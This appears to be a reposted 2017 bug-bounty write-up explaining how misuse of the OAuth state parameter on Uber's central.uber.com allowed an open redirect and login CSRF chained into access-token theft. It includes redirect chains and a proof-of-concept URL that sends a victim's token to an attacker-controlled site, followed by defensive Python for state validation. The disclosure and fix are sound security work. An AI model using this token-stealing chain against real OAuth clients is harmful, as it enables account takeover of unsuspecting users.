How I dug up an $8,000 Uber vulnerability - vulnerability warning - the black bar safety net

2017-07-10T00:00:00
ID MYHACK58:62201787740
Type myhack58
Reporter Anonymous
Modified 2017-07-10T00:00:00

Description

I have been studying Uber for a while, and this is the first time I have published a report on an Uber vulnerability; I hope it gives you some interesting bug-hunting ideas. In this article I share an interesting chain I found in one of Uber's systems: Login CSRF + open redirect -> account takeover.

Long story short

The vulnerability exists in the central.uber.com node, which uses the OAuth 2.0 protocol as its login authorization mechanism. The node did not use the state parameter as a CSRF token; it used it as a redirect target instead. This lets an attacker abuse the state parameter for both an open redirect and a Login CSRF, and then, once the redirect lands on a page the attacker controls, steal the access token from the URL hash (fragment).

The central.uber.com login process

First we need to understand how central.uber.com logs users in. When a user clicks the Login button on a central.uber.com page, the system performs the following sequence of redirects:

1. https://central.uber.com/login?state=/somewhere
2. https://login.uber.com/oauth/authorize?response_type=code&scope=profile%20history&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback&state=%2Fsomewhere
3. https://central.uber.com/oauth2-callback?state=%2F&code=it53JtFe6BPGH1arCLxQ6InrT4MXdd
4. https://central.uber.com/somewhere

Note: to fully understand this vulnerability you first have to be clear on how this node logs users in, so please spend some time on the redirect chain given above.

Open redirect

Having seen the whole login process, the first attack I thought of was changing the state parameter from /somewhere to //google.com to obtain an open redirect. After that change the login process looks like this:

1. https://central.uber.com/login?state=//google.com
2. https://login.uber.com/oauth/authorize?response_type=code&scope=profile%20history&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback&state=%2F%2fgoogle.com
3. https://central.uber.com/oauth2-callback?state=%2F%2fgoogle.com&code=it53JtFe6BPGH1arCLxQ6InrT4MXdd
4. //google.com

Sure enough, as I expected, I had turned the login process into an open redirect vulnerability. However, Uber does not accept open redirect reports, so I needed a way to turn this into a more interesting vulnerability. Regardless, it was a very good place to start.

Because the OAuth request uses response_type=code rather than token, even with an open redirect we cannot use it to steal any information. What happens if we change the request from code to token?

1. https://login.uber.com/oauth/authorize?response_type=token&scope=profile%20history&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback&state=%2F%2fgoogle.com
2. https://central.uber.com/oauth2-callback?state=%2F%2fgoogle.com#access_token=xxxxx
3. No redirect happens

Because we have not supplied https://central.uber.com/oauth2-callback with a valid code value, the redirect in step 2 fails, and without the redirect we cannot steal the access token. So we have to solve this problem: we need a valid code value for the oauth2-callback node.

Login CSRF

This is where Login CSRF comes in handy. Because this Uber node uses the state parameter for the redirect rather than for CSRF protection, we can add the attacker's own valid OAuth code directly to the oauth2-callback URL and send the resulting link to the target user. When the user opens the link, the callback succeeds, the user is redirected to the attacker-controlled page, and their access token is leaked in the fragment.

Limitations

The only requirement for exploiting this vulnerability is that the target user's browser holds an authenticated login.uber.com session. Because central.uber.com is an official Uber OAuth client, every Uber user's account accepts central.uber.com's authorization request by default.

Proof of concept

PoC:

https://login.uber.com/oauth/authorize?response_type=token&scope=profile%20history%20places%20ride_widgets%20request%20request_receipt%20all_trips&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback%3fcode%3d{attacker's valid OAuth code}&state=%2F%2f{attacker-controlled site}

PoC login process:

1. https://login.uber.com/oauth/authorize?response_type=token&scope=profile%20history%20places%20ride_widgets%20request%20request_receipt%20all_trips&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback%3fcode%3d{attacker's valid OAuth code}&state=%2F%2f{attacker-controlled site}
2. https://central.uber.com/oauth2-callback?state=%2F%2fhackerone.com&code={attacker's valid OAuth code}#access_token={target user's access token}
3. //hackerone.com#access_token={target user's access token}

Summary

Finally done! I reported this vulnerability to Uber's security team; Uber confirmed it and rewarded me with $8,000. Thank you all for reading, and if you have any other views or ideas please contact me: 281936@qq.com
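The two defects in the callback described above (state carrying a redirect target verbatim, and state not bound to the browser session) are shown here with the correct pattern beside them, as an added example that is not Uber's code; the authorize URL, client id and redirect URI are placeholder assumptions.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

# Placeholder values (assumptions for this example, not Uber's real configuration).
AUTHORIZE_URL = "https://idp.example/oauth/authorize"
CLIENT_ID = "example-client-id"
REDIRECT_URI = "https://client.example/oauth2-callback"


def is_safe_return_path(path: str) -> bool:
    """Accept only a same-origin relative path such as '/somewhere'.

    Rejects scheme-relative '//google.com' (the trick in the write-up),
    absolute URLs, and backslash variants some browsers normalise to '/'.
    """
    if not path.startswith("/") or path.startswith("//") or "\\" in path:
        return False
    parts = urlsplit(path)
    return not parts.scheme and not parts.netloc


def begin_login(session: dict, return_to: str) -> str:
    """Start the flow: a random state nonce is bound to the session and the
    desired return path is kept server-side instead of travelling in state."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    session["oauth_return_to"] = return_to if is_safe_return_path(return_to) else "/"
    query = urlencode({"response_type": "code", "client_id": CLIENT_ID,
                       "redirect_uri": REDIRECT_URI, "state": state})
    return f"{AUTHORIZE_URL}?{query}"


def handle_callback(session: dict, callback_url: str) -> str:
    """Validate the callback and return the local path to redirect to.

    Raises ValueError when the state does not match the one this session
    issued (a login CSRF attempt carrying someone else's code) or when the
    authorization code is missing.
    """
    q = parse_qs(urlsplit(callback_url).query)
    state = q.get("state", [""])[0]
    expected = session.pop("oauth_state", None)  # single use
    if not expected or not hmac.compare_digest(state.encode(), expected.encode()):
        raise ValueError("state mismatch: rejecting callback (possible login CSRF)")
    if not q.get("code", [""])[0]:
        raise ValueError("missing authorization code")
    # The code would now be exchanged for a token server-side (omitted here);
    # with response_type=code no token ever rides in a URL fragment.
    return session.pop("oauth_return_to", "/")
```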